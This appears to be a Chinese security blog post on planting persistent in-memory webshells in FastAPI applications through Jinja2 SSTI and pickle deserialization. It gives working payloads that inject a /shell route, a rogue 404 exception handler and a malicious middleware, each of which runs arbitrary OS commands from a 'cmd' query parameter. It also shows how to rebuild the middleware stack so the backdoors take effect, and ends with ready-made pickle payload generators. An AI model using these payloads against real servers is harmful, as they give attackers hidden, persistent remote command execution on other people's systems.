前言

前段时间探索了 Flask 的内存马,打算看看其他 python 框架的内存马利用姿势。发现 FastAPI 的内存马好像研究的人不多,遂探究之

这里自卖自夸一下,本文讨论了两个比较新的 FastAPI 内存马的攻击方式,分别是打中间件和打异常处理器。个人认为是全新的姿势,这两条路径至少在我发这篇文章之前我没看到有相关资料(这个框架还是太冷门了hhh

本人技术有限,发表此文章也是为了抛砖引玉,大佬们有什么灵感或建议还望多多交流、指导

SSTI 下的利用

使用下面的 SSTI 板子来测试,本人测试环境为 python3.12.5、fastapi0.112.2

from fastapi import FastAPI
from fastapi.responses import HTMLResponse
from jinja2 import Environment

app = FastAPI()
Jinja2 = Environment()

@app.get("/")
async def index():
    return {"message": "Hello World"}

@app.get("/hack")
async def hack(username="Guest"):
    output = Jinja2.from_string("Welcome " + username).render()
    return HTMLResponse(content=output)

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, port=8000)

由于 fastapi 提供的 fastapi.templating.Jinja2Templates.TemplateResponse 本身是不存在 SSTI 漏洞的(除非存在“编辑原有模板”或者“上传模板”等等操作,这里不讨论),所以我们要手动引入 JinJa2 来渲染模板

经典路线:打路由添加函数

首先跟进 FastAPI.get 装饰器

截图

返回了在 self.router 中获取的另一个装饰器,这个 self.router 是一个 APIRouter 对象

截图

继续跟进 APIRouter.get,发现这玩意又调用了 api_route,并且入参 methods=["GET"]

截图

直觉告诉我 api_route 就是一个动态生成装饰器的函数 ,再跟进 APIRouter.api_route

截图

跟到这边总算是看见闭包了,可以看到这里调用了 APIRouter.add_api_route,并且使用被装饰的函数作为入参

到这里就是真正注册路由的逻辑了,add_api_route 做了很多事情,不过我们都不用管,直接调用它来添加恶意路由即可

容易构造出 payload

lipsum.__globals__['__builtins__']['eval'](
    "sys.modules['__main__'].__dict__['app'].router.add_api_route(
        '/shell',lambda cmd='whoami':__import__('os').popen(cmd).read(),methods=['GET']
    )"
)

由于 fastapi 直接把 endpoint 的入参当作查询参数,所以这里给 lambda 函数加了一个 cmd 入参

img

img

此时我们就在 /shell 路由写入了内存马,传查询参数 cmd 来执行指定命令即可

新路线探究:中间件和异常处理器

之前研究 Flask 内存马的时候见过使用 @app.before_request 等等钩子函数的利用方式,就想着 FastAPI 是不是也有类似的

在官方文档搜 handler 找到了一些可能可以利用的点

img

异常处理器的初步探索

首先来研究一下 @app.exception_handler,这个装饰器能够注册一个处理指定异常的函数,例如

from fastapi import FastAPI
from fastapi.responses import JSONResponse

app = FastAPI()

@app.exception_handler(404)
async def handler_404(request, exc):
    print('not found!')
    return JSONResponse(
        status_code=404,
        content={"message": "Not found"}
    )

@app.get("/")
async def index():
    return {"message": "Hello World"}

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, port=8000)

此时我们访问一个不存在的路由触发 404 异常

img

可以看到返回值是我们自定义的 {"message": "Not found"}

控制台也打印了 not found!

img

跟进该装饰器,可以发现它调用 add_exception_handler 来实现异常处理器的注册

截图

所以我们也调用一下这个函数,期待能够将 webshell 注册进异常处理函数,payload:

lipsum.__globals__['__builtins__']['eval'](
    "sys.modules['__main__'].app.add_exception_handler(
        404,lambda request, exc:__import__('os').popen(
            request.query_params.get('cmd') or 'whoami'
        ).read()
    )"
)

然后就可以了,吗?访问一个不存在的页面,发现根本没有触发我们期望的内存马

是没有写进去吗?查看 app.exception_handlers,发现确实写进去了

@app.get("/")
async def index():
    # 控制台输出 app.exception_handlers 来检查是否写入
    print("app.exception_handlers:", app.exception_handlers)
    return {"message": "Hello World"}

img

怎么回事?明明成功写到 app.exception_handlers 里了,为啥没有触发

这时候有一点卡住了,但是我一通调试(具体怎么调的搞忘了),找到了 FastAPI 处理各种异常的具体逻辑

位于 starlette._exception_handler.wrap_app_handling_exceptions,fastapi 依赖于 starlette,异常处理也继承于它

可以看到这里就是 exception_handler 的选取过程,在触发异常时,如果属于 HTTPException,就会到 status_handlers 里面找对应的异常处理器

img

OK,既然找到这里来了,干脆直接把 status_handlers 打印出来看一眼,我写进去的内存马,到底在不在里面?

意料之中,出现在 app.exception_handlers 的 404 异常处理函数,却没有出现在 status_handlers

img

顺着 wrap_app_handling_exceptions 往前倒,发现关键在 ExceptionMiddleware 类,位于 starlette.middleware.exceptions.ExceptionMiddleware

class ExceptionMiddleware:
    def __init__(
        self,
        app: ASGIApp,
        handlers: typing.Mapping[
            typing.Any, typing.Callable[[Request, Exception], Response]
        ]
        | None = None,
        debug: bool = False,
    ) -> None:
        self.app = app
        self.debug = debug  # TODO: We ought to handle 404 cases if debug is set.
        self._status_handlers: StatusHandlers = {}
        self._exception_handlers: ExceptionHandlers = {
            HTTPException: self.http_exception,
            WebSocketException: self.websocket_exception,
        }
        if handlers is not None:
            for key, value in handlers.items():
                self.add_exception_handler(key, value)

    def add_exception_handler(
        self,
        exc_class_or_status_code: int | type[Exception],
        handler: typing.Callable[[Request, Exception], Response],
    ) -> None:
        if isinstance(exc_class_or_status_code, int):
            self._status_handlers[exc_class_or_status_code] = handler
        else:
            assert issubclass(exc_class_or_status_code, Exception)
            self._exception_handlers[exc_class_or_status_code] = handler

    async def __call__(self, scope: Scope, receive: Receive, send: Send) -> None:
        if scope["type"] not in ("http", "websocket"):
            await self.app(scope, receive, send)
            return

        scope["starlette.exception_handlers"] = (
            self._exception_handlers,
            self._status_handlers,
        )

        conn: Request | WebSocket
        if scope["type"] == "http":
            conn = Request(scope, receive, send)
        else:
            conn = WebSocket(scope, receive, send)

        await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)

    def http_exception(self, request: Request, exc: Exception) -> Response:
        assert isinstance(exc, HTTPException)
        if exc.status_code in {204, 304}:
            return Response(status_code=exc.status_code, headers=exc.headers)
        return PlainTextResponse(
            exc.detail, status_code=exc.status_code, headers=exc.headers
        )

    async def websocket_exception(self, websocket: WebSocket, exc: Exception) -> None:
        assert isinstance(exc, WebSocketException)
        await websocket.close(code=exc.code, reason=exc.reason)  # pragma: no cover

可以看到在 __call__ 魔术方法里面调用了 wrap_app_handling_exceptions(self.app, conn)(scope, receive, send) 来处理错误

这里传入的参数 conn 里面就包含了 exception_handler,前面打印的 status_handlers 其实就是 conn.scope[“starlette.exception_handlers”]

img

那 scope[“starlette.exception_handlers”] 从何而来,其实上面已经写出来了

scope["starlette.exception_handlers"] = (
    self._exception_handlers,
    self._status_handlers,
)

所以说调用 FastAPI.add_exception_handler 修改 FastAPI 的 exception_handlers 属性是没用的,真正起作用的是 ExceptionMiddleware 的 _exception_handlers 和 _status_handlers

好消息是 ExceptionMiddleware 提供了 add_exception_handler 方法

那此时我们的任务就变成了触发 ExceptionMiddlewareadd_exception_handler 方法,这里才是真正添加异常处理器的地方

到底是谁实例化了 ExceptionMiddleware 呢?全局搜索后发现

img

img

所以到 app.middleware_stack 里面应该就能找到 ExceptionMiddleware object

img

到这里就算找完整条链子了,还有一个小细节,错误处理器的返回值不能直接是 str,否则会报错。所以我用 JSONResponse 来携带内存马的回显(使用 FastAPI 支持的其他 Response 也可以,参考 fastapi.responses

payload

lipsum.__globals__['__builtins__']['eval'](
    "sys.modules['__main__'].app.middleware_stack.app.add_exception_handler(
          404,lambda request,exc:sys.modules['__main__'].app.__init__.__globals__['JSONResponse'](
              content={'message':__import__('os').popen(request.query_params.get('cmd') or 'whoami').read()}
          )
    )"
)

此时触发 404 异常就会看到我们写入的内存马(JSONResponse 默认返回 200 状态码)

img

需要注意的是,如果存在其他中间件的话,ExceptionMiddleware 会在 middleware_stack 更深处,此时就需要多次获取 app 属性(如 middleware_stack.app.app.app)直到到达 ExceptionMiddleware,具体原因在中间件的研究部分会提到

对中间件与中间件堆栈的研究

再来看 @app.middleware,这个装饰器能够给指定的请求方式注册中间件,目前 FastAPI 只支持给 http 添加中间件

下面是一个简单的示例

from fastapi import FastAPI, Request
from jinja2 import Environment

app = FastAPI()
Jinja2 = Environment()

@app.middleware('http')
async def say_hello(request: Request, call_next):
    response = await call_next(request)
    response.headers['say'] = 'hello!'
    return response

@app.get("/")
async def index():
    print("app.exception_handlers:", app.exception_handlers)
    return {"message": "Hello World"}

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, port=8000)

img

可以看到这个装饰器其实和 Flask 的 @app.before_request 和 @app.after_request 挺类似的,用法如下

@app.middleware('http')
async def middleware(request: Request, call_next):
    # 处理请求前要做的事
    response = await call_next(request)
    # 处理请求后要做的事
    return response

跟进该装饰器,发现它调用 app.add_middleware 来添加中间件

截图

但是无法直接调用该函数来添加中间件,会报 RuntimeError

img

继续查看 add_middleware 的逻辑,发现可以通过直接操作 app.user_middleware 来绕过防御机制

img

简单搓了个 payload(这里是不对的,中间件必须是异步函数,但是 lambda 不支持异步,即使打进去了也会报错

lipsum.__globals__['__builtins__']['eval'](
    "sys.modules['__main__'].app.user_middleware.insert(
        0,
        sys.modules['__main__'].app.__init__.__globals__['Middleware'](
            sys.modules['__main__'].app.__init__.__globals__['BaseHTTPMiddleware'],
            dispatch=lambda request,call_next:sys.modules['__main__'].app.__init__.__globals__['JSONResponse'](
                content={'message':__import__('os').popen(request.query_params.get('cmd') or 'whoami').read()}
            )
        )
    )"
)

然后发现打了没有用,有了前面对异常处理器的探索,这个结果在预期之中。检查 user_middleware,发现确实是成功把中间件写进去了。查找 user_middleware 的引用,发现又回到了熟悉的地方

img

又是 middleware_stack,这回我不得不重点审计这个属性了。查阅了一下官方文档,FastAPI doc 没有提到这个属性,Starlette doc 提了两句,但是也没有多少说明

我使用如下代码进行测试,包含了复数个中间件,同时还有一个自定义的异常处理器

from fastapi import FastAPI, Request
from fastapi.responses import HTMLResponse, JSONResponse
from jinja2 import Environment

app = FastAPI()
Jinja2 = Environment()

@app.exception_handler(404)
async def handler_404(request, exc):
    print('not found!')
    return JSONResponse(
        status_code=404,
        content={"message": "Not found"}
    )

@app.middleware('http')
async def say_hello(request: Request, call_next):
    response = await call_next(request)
    response.headers['say1'] = 'hello!'
    return response

@app.middleware('http')
async def say_hi(request: Request, call_next):
    response = await call_next(request)
    response.headers['say2'] = 'hi!'
    return response

@app.get("/")
async def index():
    return {"message": "Hello World"}

@app.get("/hack")
async def hack(username="Guest"):
    output = Jinja2.from_string("Welcome " + username).render()
    return HTMLResponse(content=output)

if __name__ == "__main__":
    import uvicorn
    uvicorn.run(app, port=8000)

此时查看 middleware_stack,就会发现里面的元素呈现一个嵌套的关系

app.middleware_stack.__dict__

img

app.middleware_stack.app.__dict__

img

app.middleware_stack.app.app.__dict__

img

app.middleware_stack.app.app.app.__dict__

img

结构类似下图,结合 “middleware_stack” 的名称,Starlette 应该是构建了一个中间件堆栈,每次处理请求时,按照堆栈内中间件的顺序依次调用(错误处理器也是一个中间件)中间件堆栈在应用启动时就构建完成了,所以在运行时修改 FastAPI.exception_handlersFastAPI.user_middleware 不会直接改变中间件的行为

截图

研究后发现 BaseHTTPMiddleware object 总是最先被获取,然后是 ExceptionMiddleware object,最后是 APIRouter。原因也很简单,生成中间件堆栈的逻辑就是这样写的

middleware = (
    [Middleware(ServerErrorMiddleware, handler=error_handler, debug=debug)]
    # 自定义的中间件, BaseHTTPMiddleware
    + self.user_middleware
    # 异常处理器, ExceptionMiddleware
    + [
        Middleware(
            ExceptionMiddleware, handlers=exception_handlers, debug=debug
        )
    ]
)
# APIRouter
app = self.router
# 这里就是构建层层嵌套的结构的地方
# APIRouter 被包在了最内层
# 然后是 ExceptionMiddleware, 在倒数第二层
# 接下来是 BaseHTTPMiddleware
# 最后 ServerErrorMiddleware 成为最外层, 也就是 middleware_stack 本身
for cls, args, kwargs in reversed(middleware):
    app = cls(app=app, *args, **kwargs)
return app

中间件堆栈中的元素排列顺序

浅
|   普通中间件1 BaseHTTPMiddleware
|   普通中间件2 BaseHTTPMiddleware
|   ...
|   异常处理器  ExceptionMiddleware
|   路由处理器  APIRouter
深

所以,如果一个 FastAPI 应用存在中间件,就需要在中间件堆栈中多找几层才能获取到 ExceptionMiddleware object

回到内存马,既然中间件堆栈呈现了一个嵌套的结构,我们要怎么添加一个自定义的中间件呢?

我们不一定非要直接改 middleware_stack 中的内容,在应用启动的时候,中间件堆栈会使用 build_middleware_stack 来构建自身。那能不能在运行时使用这个函数重新构建 middleware_stack 呢?

img

事实证明是可以的,我们利用 exec 函数,将 build_middleware_stack 的返回值赋给 app.middleware_stack,这样中间件堆栈就会重新生成,我们写入 app.user_middleware 的恶意中间件也就成功插入了堆栈

payload:

# 先向 user_middleware 写入恶意中间件
lipsum.__globals__['__builtins__']['exec'](
"app=sys.modules['__main__'].app
async def evil(request,call_next):
    global app
    return app.__init__.__globals__['JSONResponse'](
        content={'message':__import__('os').popen(request.query_params.get('cmd') or 'whoami').read()}
    )
app.user_middleware.insert(0,app.__init__.__globals__['Middleware'](
    app.__init__.__globals__['BaseHTTPMiddleware'],
    dispatch=evil
)"
)
# 然后重新构建 middleware_stack
lipsum.__globals__['__builtins__']['exec'](
  "app=sys.modules['__main__'].app;app.middleware_stack=app.build_middleware_stack()"
)

由于使用了 exec,所以要格外注意换行和空格数量

img

img

通过中间件添加内存马后,访问任意路由并传查询参数 cmd 即可执行任意命令

img

对异常处理器的补充

回头看初步探索异常处理器时尝试的一条 payload:

lipsum.__globals__['__builtins__']['eval'](
    "sys.modules['__main__'].app.add_exception_handler(
        404,lambda request, exc:__import__('os').popen(
            request.query_params.get('cmd') or 'whoami'
        ).read()
    )"
)

当时打这条的时候没有起作用,原因在前面也讨论了。在探究完中间件堆栈后,这条 pyload 其实还是有利用的价值

首先要将返回值改为 FastAPI 支持的类型,然后在打完 pyload 之后再重新构建 middleware_stack 即可

流程如下

# 先添加恶意的异常处理器
lipsum.__globals__['__builtins__']['eval'](
    "sys.modules['__main__'].app.add_exception_handler(
        404,lambda request, exc:sys.modules['__main__'].app.__init__.__globals__['JSONResponse'](
            content={'message':__import__('os').popen(request.query_params.get('cmd') or 'whoami').read()}
        )
    )"
)
# 然后重新构建 middleware_stack
lipsum.__globals__['__builtins__']['exec'](
  "app=sys.modules['__main__'].app;app.middleware_stack=app.build_middleware_stack()"
)

img

img

img

pickle 下的利用

和 Flask 一样,内存马的利用形式不仅限于 SSTI

add_api_route

import pickle
import base64

payload = "sys.modules['__main__'].__dict__['app'].router.add_api_route('/shell',lambda cmd='whoami':__import__('os').popen(cmd).read(),methods=['GET'])"

class Evil():
    def __reduce__(self):
        return (eval,(payload,))

print(base64.b64encode(pickle.dumps(Evil())))

中间件

import pickle
import base64

payload = """app=sys.modules['__main__'].app
async def evil(request,call_next):
    global app
    return app.__init__.__globals__['JSONResponse'](
        content={'message':__import__('os').popen(request.query_params.get('cmd') or 'whoami').read()}
    )
app.user_middleware.insert(0,app.__init__.__globals__['Middleware'](
    app.__init__.__globals__['BaseHTTPMiddleware'],
    dispatch=evil
)
app.middleware_stack=app.build_middleware_stack()"""

class Evil():
    def __reduce__(self):
        return (exec,(payload,))

print(base64.b64encode(pickle.dumps(Evil())))

异常处理器

import pickle
import base64

payload = """app=sys.modules['__main__'].app
app.add_exception_handler(
    404,
    lambda request, exc:app.__init__.__globals__['JSONResponse'](
        content={'message':__import__('os').popen(request.query_params.get('cmd') or 'whoami').read()}
    )
)
app.middleware_stack=app.build_middleware_stack()"""

class Evil():
    def __reduce__(self):
        return (exec,(payload,))

print(base64.b64encode(pickle.dumps(Evil())))